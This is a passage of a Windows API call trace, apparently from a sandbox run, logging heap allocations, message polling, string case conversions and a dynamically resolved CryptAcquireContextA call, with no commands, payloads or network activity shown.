(HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.323] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa248 [0262.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.324] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.324] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0262.325] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.325] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0262.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0262.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0262.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.328] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0262.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e30, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0262.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0262.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.331] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.332] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.334] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.335] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.335] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0262.335] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.335] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0262.335] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.335] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0262.336] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.336] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.336] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.336] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.336] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.336] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.336] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0262.336] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.336] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0262.337] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.337] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.337] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0262.337] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.337] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.337] RtlAllocateHeap 